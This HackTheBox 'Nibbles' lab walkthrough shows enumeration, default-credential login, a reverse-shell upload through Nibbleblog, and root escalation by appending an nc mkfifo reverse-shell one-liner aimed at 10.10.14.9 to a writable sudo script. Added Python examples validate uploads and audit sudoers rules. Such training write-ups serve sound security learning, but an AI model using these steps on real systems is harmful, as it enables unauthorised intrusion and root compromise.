HackTheBox: Nibbles — Walkthrough

Sanaullah Aman Korai
4 min read · Jun 28, 2023

Enumeration

Let’s get started with an Nmap scan:

Nmap scan report for 10.10.10.75
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4f8ade8f80477decf150d630a187e49 (RSA)
| 256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_ 256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.04 seconds

As we can see, two ports are open: 22 and 80. Let’s enumerate port 80.

Nothing interesting on the web page, so let’s look at its source code.

We can see a directory named /nibbleblog/. Let’s see what this directory has.

Nothing interesting on the page either, so let’s enumerate the directories with gobuster.

Found lots of interesting directories there. Let’s enumerate these directories.

Found a config file that indicates the username is admin. So let’s try default creds.

I tried admin/admin but it didn’t work, but I saw nibbles mentioned quite a few times, so I tried that and boom, it worked. We are in.

After looking through the features, I looked at the My Image feature. That’s interesting, so let’s upload something and see whether it works or not.

It worked. Now we can upload the reverse shell to get the initial foothold on this box.
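For contrast, here is what an image-upload handler should have done to stop a script file from being accepted. This is an added example written for this walkthrough, not code from the page or from Nibbleblog; the function names, the extension allowlist and the sample byte strings are all assumptions constructed for the demonstration. It checks the extension against an allowlist, checks the file's leading bytes against the magic number expected for that extension, and hands back a server-generated filename so the original name never reaches the disk.

```python
import os
import secrets
from typing import Tuple

# Allowlist of image extensions and the magic bytes each one must start with.
# (constructed allowlist for the example; extend to the formats your site really needs)
ALLOWED_MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

MAX_UPLOAD_BYTES = 2 * 1024 * 1024  # 2 MiB cap, an assumed limit for the example


def validate_image_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Only the extension and the real content decide;
    the client-supplied MIME type is deliberately ignored because it is trivially spoofed."""
    if not filename or "\x00" in filename or "/" in filename or "\\" in filename:
        return False, "invalid filename"
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file too large"
    if len(data) == 0:
        return False, "empty file"

    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_MAGIC:
        return False, f"extension {ext or '(none)'} not allowed"

    # The bytes on disk must really be the image type the extension claims.
    if not any(data.startswith(magic) for magic in ALLOWED_MAGIC[ext]):
        return False, f"content does not match {ext} signature"
    return True, "ok"


def stored_name_for(filename: str) -> str:
    """Server-chosen name: random token plus the validated extension. Store it in a
    directory where the web server has script execution disabled."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed sample uploads: a PHP script, the same script renamed, and a real PNG header.
    php_payload = b"<?php echo 'not an image'; ?>"
    png_header = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
    for name, blob in [("shell.php", php_payload), ("shell.png", php_payload), ("photo.png", png_header)]:
        ok, why = validate_image_upload(name, blob)
        print(f"{name}: {'accepted as ' + stored_name_for(name) if ok else 'rejected: ' + why}")
```

The design choice worth noting: renaming the stored file and serving it from a no-execute directory means that even a validation bypass (for instance a polyglot that is both a valid image and a script) yields a file the web server will not run.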

While this is great, it does not give us a particularly nice shell to work with. We need to make it smarter by making it fully interactive. We call this upgrading to a fully interactive TTY. We can do this with a simple Python call, which looks like this:

python3 -c 'import pty; pty.spawn("/bin/bash")'

You can get the user flag from nibbler’s home. So now we have to privesc this machine. Let’s dig deeper.

Nibbler has a zip file that contains the monitor script, which the nibbler user can run as root via sudo. Since the script is writable by nibbler, that is a possible attack vector for privilege escalation.

We can use the following command to add a one-liner to the monitor.sh shell script:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 8443 >/tmp/f' | tee -a monitor.sh

Remember to edit the IP address, and take note of the port number (8443). Now all that is needed is to run another netcat listener:

nc -lvnp 8443

And run the script!

sudo /home/nibbler/personal/stuff/monitor.sh

We got root :) You can get the flag from the root directory.
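The root cause of this escalation is a sudo rule that points at a file the invoking user can modify. The audit below is an added example written for this walkthrough, not the page's own tooling and not part of the box; it parses sudoers-style rules, stats each command path, and reports the conditions that make a rule abusable: the target is group- or world-writable, not owned by root, missing (so the user could create it), a symlink, or sitting in a world-writable directory. The sudoers excerpt, the user names and the temporary script files in `demo()` are all constructed for the demonstration and only modelled on the nibbler/monitor.sh rule from the walkthrough.

```python
import os
import re
import stat
import tempfile
from typing import Dict, List, Tuple

# user  host = (runas) TAG: /path/one, /path/two   (simplified sudoers grammar, assumed)
SUDO_RULE = re.compile(
    r"^(?P<user>\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(?:\w+:\s*)*(?P<cmds>.+)$"
)


def parse_sudoers(text: str) -> List[Tuple[str, str]]:
    """Extract (user, absolute command path) pairs from sudoers-style text."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = SUDO_RULE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            tokens = cmd.strip().split()
            if tokens and tokens[0].startswith("/"):
                rules.append((m.group("user"), tokens[0]))
    return rules


def audit_rules(rules: List[Tuple[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """For each rule, list the reasons the target could be replaced or edited by a non-root user."""
    findings = []
    for user, path in rules:
        reasons: List[str] = []
        try:
            st = os.lstat(path)
        except FileNotFoundError:
            findings.append((user, path, ["target missing (could be created by the user)"]))
            continue
        if stat.S_ISLNK(st.st_mode):
            reasons.append("symlink (resolve and audit the target too)")
        if st.st_mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if st.st_uid != 0:
            reasons.append("not owned by root")
        # A writable parent directory lets the user swap the file out even if the file itself is locked.
        parent = os.path.dirname(path) or "/"
        try:
            pst = os.stat(parent)
            if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
                reasons.append("parent directory world-writable without sticky bit")
        except FileNotFoundError:
            reasons.append("parent directory missing")
        findings.append((user, path, reasons))
    return findings


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: one world-writable script (as on the box) and one locked-down
    script, both referenced by NOPASSWD rules. Returns {basename: reasons}."""
    with tempfile.TemporaryDirectory() as tmp:
        bad = os.path.join(tmp, "monitor.sh")
        good = os.path.join(tmp, "backup.sh")
        for p in (bad, good):
            with open(p, "w") as fh:
                fh.write("#!/bin/bash\necho ok\n")
        os.chmod(bad, 0o777)  # the misconfiguration the walkthrough abuses
        os.chmod(good, 0o755)  # what the file should look like
        sudoers = f"""
# constructed sudoers excerpt, modelled on the nibbler -> monitor.sh rule
Defaults env_reset
nibbler ALL=(root) NOPASSWD: {bad}
backup  ALL=(root) NOPASSWD: {good}
"""
        return {os.path.basename(p): r for _, p, r in audit_rules(parse_sudoers(sudoers))}


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(f"{name}: {', '.join(reasons) if reasons else 'ok'}")
```

On a real host you would feed it the output of `sudo -l` or the contents of `/etc/sudoers` and `/etc/sudoers.d/`; the fix for a flagged entry is to make the script root-owned and mode 0755 (or 0700) in a root-owned directory, or to drop the sudo rule entirely.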
